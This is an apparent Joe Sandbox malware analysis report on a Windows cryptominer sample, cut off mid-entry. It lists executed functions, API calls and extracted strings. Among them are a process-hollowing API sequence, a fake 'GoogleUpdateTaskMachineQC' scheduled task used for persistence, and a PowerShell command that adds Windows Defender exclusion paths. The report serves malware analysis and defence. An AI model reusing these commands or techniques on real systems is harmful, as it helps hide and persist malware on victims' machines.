Instruction ID: d591b63e0b60cec4ce36873b078e094a3255c4033aa2956d309c48b636028e8d
Opcode Fuzzy Hash: c2973ab7cbdd82c847d1c72318bc0482d6615c63ffd76cc4cc56ba9348c435dd
Instruction Fuzzy Hash: 7321073190CB4C4FDB59DFACD84A7E97BF0EB96321F04416BD448C3152DA74A816CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3496498F Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2405197291.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd34960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acb9d3e0cbc25c75cc9f1b616fc6af964f5fc302bdac334dbe215dc15888871a
Instruction ID: 1d93ff384b2cf0053fd9861a5309b4c6b6c3a82380c18612873d38d4cb44951c
Opcode Fuzzy Hash: acb9d3e0cbc25c75cc9f1b616fc6af964f5fc302bdac334dbe215dc15888871a
Instruction Fuzzy Hash: 5621E622B4DA468FE7A9DA9C54F117426C2EF9633075900BED25DC71EBCE1CEC049359

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD34894675 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2404315558.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee1d83e8d9ad0ff779d92e08f69f1e06b52c9e2b47039ca20a01433bafa786f3
Instruction ID: 76085c6dd3716b73fd176d99b8e85ba88af67c9da9f3be81d669a3198407d212
Opcode Fuzzy Hash: ee1d83e8d9ad0ff779d92e08f69f1e06b52c9e2b47039ca20a01433bafa786f3
Instruction Fuzzy Hash: D301677121CB0C4FD744EF4CE451AA5B7E0FB99364F10056EE58AC3651D636E881CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3489AE68 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2404315558.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13c51ae458ddcd1eeb43a4ae2a3e07a374297d53a93131feea3007a4c5d0f8cb
Instruction ID: 205a0f46094506d71f81f954e9c86526e4751f89e4aa50c705046b783dd96ed9
Opcode Fuzzy Hash: 13c51ae458ddcd1eeb43a4ae2a3e07a374297d53a93131feea3007a4c5d0f8cb
Instruction Fuzzy Hash: A3F0963590C6C98FDB169F2888555D97FE0EF17210B05029BD458C71A2DB649458C782

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD349653E4 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2405197291.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd34960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaf2f4fc88aceabc668cbcb0230df7ce2ea25a4cc71bd7904b5b64d3a49115fa
Instruction ID: 2d2e56356d0090021814cb74f162a4614251324e5bc7031616d6ed6300252d5f
Opcode Fuzzy Hash: aaf2f4fc88aceabc668cbcb0230df7ce2ea25a4cc71bd7904b5b64d3a49115fa
Instruction Fuzzy Hash: 58F0A03131CF044FE748EE2DE44A6A2B3E0FBA8311F10462FE44AC3251DA25E8818782

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD34964CD0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2405197291.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd34960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4c95edb86f8f05fc92e7da881c15be9f2037b29d8773865de8b9479fcbe2503
Instruction ID: b11c80e187d6c9565bb305a5247cb67841be4ee61c5215f4d2a84e80499345c4
Opcode Fuzzy Hash: d4c95edb86f8f05fc92e7da881c15be9f2037b29d8773865de8b9479fcbe2503
Instruction Fuzzy Hash: 8CF05E32A0D5448FDB54EB9CE4A14E877E0FF4633071500BAE25DC75A7DA2AEC54C754

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: updater.exePID: 6820, Parent PID: 1064COMMON

Executed Functions

Function 00007FF7FA9914B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2684792797.00007FF7FA991000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF7FA990000, based on PE: true

Associated: 00000027.00000002.2684644127.00007FF7FA990000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000027.00000002.2684843852.00007FF7FA9B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000027.00000002.2685711012.00007FF7FAF21000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000027.00000002.2685743760.00007FF7FAF2C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000027.00000002.2685797979.00007FF7FAF2F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000027.00000002.2685827421.00007FF7FAF30000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ff7fa990000_updater.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e79f93c7cd3705f9aaf9e11784eb747df23ff89f702dc453d33123077158a3e8
Instruction ID: 433eac7873a37f3a3d597168864bd56f006104c2c5aadf89c85acec81bcdd59e
Opcode Fuzzy Hash: e79f93c7cd3705f9aaf9e11784eb747df23ff89f702dc453d33123077158a3e8
Instruction Fuzzy Hash: FAB09220904209A4F300BF01A881258B6A06B08742F9040B1C51C063A2CBAC90404BA0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: cdttvvcPID: 3492, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	33%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	39
Total number of Limit Nodes:	7

Executed Functions

Function 00A50110 Relevance: 22.7, APIs: 15, Instructions: 248
memorynativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 00A50156
GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 00A5016C
CreateProcessA.KERNELBASE(?,00000000), ref: 00A50255
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00A50270
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00A50283
Wow64GetThreadContext.KERNEL32(00000000,?), ref: 00A5029F
ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 00A502C8
NtUnmapViewOfSection.NTDLL(00000000,?), ref: 00A502E3
VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00A50304
NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 00A5032A
NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 00A50399
WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 00A503BF
Wow64SetThreadContext.KERNEL32(00000000,?), ref: 00A503E1
ResumeThread.KERNELBASE(00000000), ref: 00A503ED
ExitProcess.KERNEL32(00000000), ref: 00A50412

Memory Dump Source

Source File: 00000039.00000002.2539907953.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_a50000_cdttvvc.jbxd

Similarity

API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
String ID:
API String ID: 93872480-0
Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction ID: f8f678a35dacf287637cd1c36dea49cb462d16eeaf2116520a8cb5c044477a25
Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction Fuzzy Hash: 4FB1C874A00208AFDB44CF98C895F9EBBB5FF88314F248158E909AB391D771AD45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00A50420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 00A50533

Strings

saodkfnosa9uin, xrefs: 00A504DA
d, xrefs: 00A50584
mfoaskdfnoa, xrefs: 00A50520, 00A50523
0, xrefs: 00A50492

Memory Dump Source

Source File: 00000039.00000002.2539907953.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_a50000_cdttvvc.jbxd

Similarity

API ID: CreateWindow
String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
API String ID: 716092398-2341455598
Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction ID: d961b44f513ae22ea89380898eb8862a1313d64da5d4c3cea09e3ea38fe22cb8
Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction Fuzzy Hash: 7A512A70D08388DEEB11CBE8C849BDDBFB2AF11709F144058D9447F286D3BA5A58CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00A505B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(apfHQ), ref: 00A505EC

Strings

apfHQ, xrefs: 00A505E2, 00A505E5
o, xrefs: 00A50600

Memory Dump Source

Source File: 00000039.00000002.2539907953.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_a50000_cdttvvc.jbxd

Similarity

API ID: AttributesFile
String ID: apfHQ$o
API String ID: 3188754299-2999369273
Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction ID: 54b2f36f8f11d4eee2503f924721c965d780bc2c37cb0f2ae53487f4820f2b57
Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction Fuzzy Hash: DA012170C0424CEEDF10DF98C5187AEBFB5AF51309F1480D9D8092B242D7B69B58CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A88334 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00A8835C
Module32First.KERNEL32(00000000,00000224), ref: 00A8837C

Memory Dump Source

Source File: 00000039.00000002.2540236474.0000000000A82000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A82000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_a82000_cdttvvc.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 09381ade35e5eb025d10303bb1a4c180cee9fd4f994b8a77b0210d5f4a7aa57c
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 17F0F032200311AFD7203BF9A88CB6EB2E8FF59B21F540628E642990C0DF74EC058B61

Uniqueness

Uniqueness Score: -1.00%

Function 00A87FF3 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00A88044

Memory Dump Source

Source File: 00000039.00000002.2540236474.0000000000A82000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A82000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_a82000_cdttvvc.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 134283acaa19eb91aaeac2d74b4772cdc4a876a8409f089c05f15c6868dc03d1
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 3C113C79A00208EFDB01DF98CA85E99BBF5EF08751F158094F9489B362D775EA90DF80

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: cdttvvcPID: 6044, Parent PID: 3492COMMON

Execution Graph

Execution Coverage:	6.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	19
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0040180C Relevance: 3.0, APIs: 2, Instructions: 50
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 0000003B.00000002.2612177429.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_59_2_400000_cdttvvc.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B

Uniqueness

Uniqueness Score: -1.00%

Function 00401818 Relevance: 3.0, APIs: 2, Instructions: 45
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 0000003B.00000002.2612177429.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_59_2_400000_cdttvvc.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B

Uniqueness

Uniqueness Score: -1.00%

Function 00401822 Relevance: 3.0, APIs: 2, Instructions: 44
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 0000003B.00000002.2612177429.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_59_2_400000_cdttvvc.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B

Uniqueness

Uniqueness Score: -1.00%

Function 00401826 Relevance: 3.0, APIs: 2, Instructions: 40
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 0000003B.00000002.2612177429.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_59_2_400000_cdttvvc.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B

Uniqueness

Uniqueness Score: -1.00%

Function 00401834 Relevance: 3.0, APIs: 2, Instructions: 39
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 0000003B.00000002.2612177429.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_59_2_400000_cdttvvc.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: conhost.exePID: 6888, Parent PID: 4004COMMON

Execution Graph

Execution Coverage:	4.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	242
Total number of Limit Nodes:	4

Executed Functions

Function 00007FF6EB4485E0 Relevance: 59.6, APIs: 17, Strings: 22, Instructions: 1104
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcslen.MSVCRT ref: 00007FF6EB448728
memset.MSVCRT ref: 00007FF6EB4488BC
memset.MSVCRT ref: 00007FF6EB448A4C
memset.MSVCRT ref: 00007FF6EB448B17
memset.MSVCRT ref: 00007FF6EB448CBD
memset.MSVCRT ref: 00007FF6EB448EE6
memset.MSVCRT ref: 00007FF6EB44906F
memset.MSVCRT ref: 00007FF6EB44913D

Part of subcall function 00007FF6EB431EB0: memcpy.MSVCRT ref: 00007FF6EB431F3B
Part of subcall function 00007FF6EB431EB0: wcslen.MSVCRT ref: 00007FF6EB4320A0
Part of subcall function 00007FF6EB431EB0: memcpy.MSVCRT ref: 00007FF6EB4320BF

_wcsicmp.MSVCRT ref: 00007FF6EB4494CB
memcpy.MSVCRT ref: 00007FF6EB44952A
memcpy.MSVCRT ref: 00007FF6EB449550
memcpy.MSVCRT ref: 00007FF6EB4496C0
memcpy.MSVCRT ref: 00007FF6EB4496EA
memcpy.MSVCRT ref: 00007FF6EB449965
memcpy.MSVCRT ref: 00007FF6EB44998F
memcpy.MSVCRT ref: 00007FF6EB449C16
memcpy.MSVCRT ref: 00007FF6EB449C42

Strings

eth, xrefs: 00007FF6EB4493DD
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineQC, xrefs: 00007FF6EB4493F5
\cmd.exe, xrefs: 00007FF6EB448A79, 00007FF6EB448AF0
\BaseNamedObjects\exwrdtlzvhyfkapm, xrefs: 00007FF6EB4492B1
xmr, xrefs: 00007FF6EB4493EE
25.<&, xrefs: 00007FF6EB448F77
\BaseNamedObjects\yrzibjnsmy, xrefs: 00007FF6EB44865B
SYSTEMROOT=, xrefs: 00007FF6EB448981
PROGRAMFILES=, xrefs: 00007FF6EB448F7E
\Google\Chrome\updater.exe, xrefs: 00007FF6EB448D17, 00007FF6EB448EC4
\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00007FF6EB448B90, 00007FF6EB448C94
\reg.exe, xrefs: 00007FF6EB44909A, 00007FF6EB449111
%S Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, xrefs: 00007FF6EB449414
\System32, xrefs: 00007FF6EB4488E7, 00007FF6EB448A2A
PROGRAMFILES=, xrefs: 00007FF6EB448DF4
\BaseNamedObjects\yrzibjnsmy, xrefs: 00007FF6EB44875E
%S /run /tn "GoogleUpdateTaskMachineQC", xrefs: 00007FF6EB4497FD, 00007FF6EB449894, 00007FF6EB44991C
\schtasks.exe, xrefs: 00007FF6EB449177, 00007FF6EB449219
\Google\Libs\, xrefs: 00007FF6EB448F20, 00007FF6EB449042
5RK\E, xrefs: 00007FF6EB448EEB
%S <#mgttsuddg#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highe, xrefs: 00007FF6EB4496D6, 00007FF6EB44970B, 00007FF6EB449767
0, xrefs: 00007FF6EB448854

Memory Dump Source

Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true

Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd

Similarity

API ID: memcpy$memset$wcslen$_wcsicmp
String ID: %S /run /tn "GoogleUpdateTaskMachineQC"$%S <#mgttsuddg#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highe$%S Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force$0$25.<&$5RK\E$PROGRAMFILES=$PROGRAMFILES=$SYSTEMROOT=$\BaseNamedObjects\exwrdtlzvhyfkapm$\BaseNamedObjects\yrzibjnsmy$\BaseNamedObjects\yrzibjnsmy$\Google\Chrome\updater.exe$\Google\Libs\$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineQC$\System32$\WindowsPowerShell\v1.0\powershell.exe$\cmd.exe$\reg.exe$\schtasks.exe$eth$xmr
API String ID: 116495249-668570170
Opcode ID: d10c5496db45c1aa93caa4f9fb91530e0631acdbeb1534beb7e2e9b31a6e44d7
Instruction ID: a1ae77acb59942288ada64b25c6e6279120db278c597a0918c5c82e9b89eb6c4
Opcode Fuzzy Hash: d10c5496db45c1aa93caa4f9fb91530e0631acdbeb1534beb7e2e9b31a6e44d7
Instruction Fuzzy Hash: 17E27F23D1DED6D4F7125B29B8423F467A0AF9A380F045231D98C9667EDF2EA15D830E

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB431180 Relevance: 12.2, APIs: 8, Instructions: 195
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 00007FF6EB4311E1
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6EB431253
malloc.MSVCRT ref: 00007FF6EB431307
strlen.MSVCRT ref: 00007FF6EB431329
malloc.MSVCRT ref: 00007FF6EB431335
memcpy.MSVCRT ref: 00007FF6EB431349
GetStartupInfoA.KERNEL32 ref: 00007FF6EB431453

Memory Dump Source

Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true

Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
String ID:
API String ID: 649803965-0
Opcode ID: f20fd020c42d19746c786ff100fbdef0b27d4e2ffdb2d0f4d7812018ae33bdc0
Instruction ID: 3faa9ca20aadd2ce1e99303d6c2ec08bf65a76222a7cd93cbdaf61f0891cbc5b
Opcode Fuzzy Hash: f20fd020c42d19746c786ff100fbdef0b27d4e2ffdb2d0f4d7812018ae33bdc0
Instruction Fuzzy Hash: E7817D77E09A06C5FA519F55E48477923A1AF0DB84F484035C90DC73B9DE3EE409870E

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB431730 Relevance: 30.1, APIs: 10, Strings: 7, Instructions: 341
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcsncmp.MSVCRT ref: 00007FF6EB43192D
memset.MSVCRT ref: 00007FF6EB431A00

Strings

explorer.exe, xrefs: 00007FF6EB431926
xmr, xrefs: 00007FF6EB431732
`, xrefs: 00007FF6EB431C87
\??\, xrefs: 00007FF6EB431AAF
0, xrefs: 00007FF6EB431973
X, xrefs: 00007FF6EB431CC1
%S Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, xrefs: 00007FF6EB431736

Memory Dump Source

Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true

Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd

Similarity

API ID: memsetwcsncmp
String ID: %S Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force$0$X$\??\$`$explorer.exe$xmr
API String ID: 1181335886-1782556084
Opcode ID: 3ad14a35a6e16667e81849032a969dc87def6bacacc2f222a86b2b443e6ab329
Instruction ID: 1aa896f402316554b381ed959e814dde02d4ac61d1bdc63b449073c3e9f68093
Opcode Fuzzy Hash: 3ad14a35a6e16667e81849032a969dc87def6bacacc2f222a86b2b443e6ab329
Instruction Fuzzy Hash: D7028163A08BC5C1E7218B25E4043AA7364FB897A4F044335DAAC976F9DF7ED189C709

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB4329A0 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00007FF6EB4329CE

Part of subcall function 00007FF6EB431730: wcsncmp.MSVCRT ref: 00007FF6EB43192D

Strings

eth, xrefs: 00007FF6EB4329A8
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineQC, xrefs: 00007FF6EB4329A7
\BaseNamedObjects\exwrdtlzvhyfkapm, xrefs: 00007FF6EB4329A0
%S Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, xrefs: 00007FF6EB4329AA

Memory Dump Source

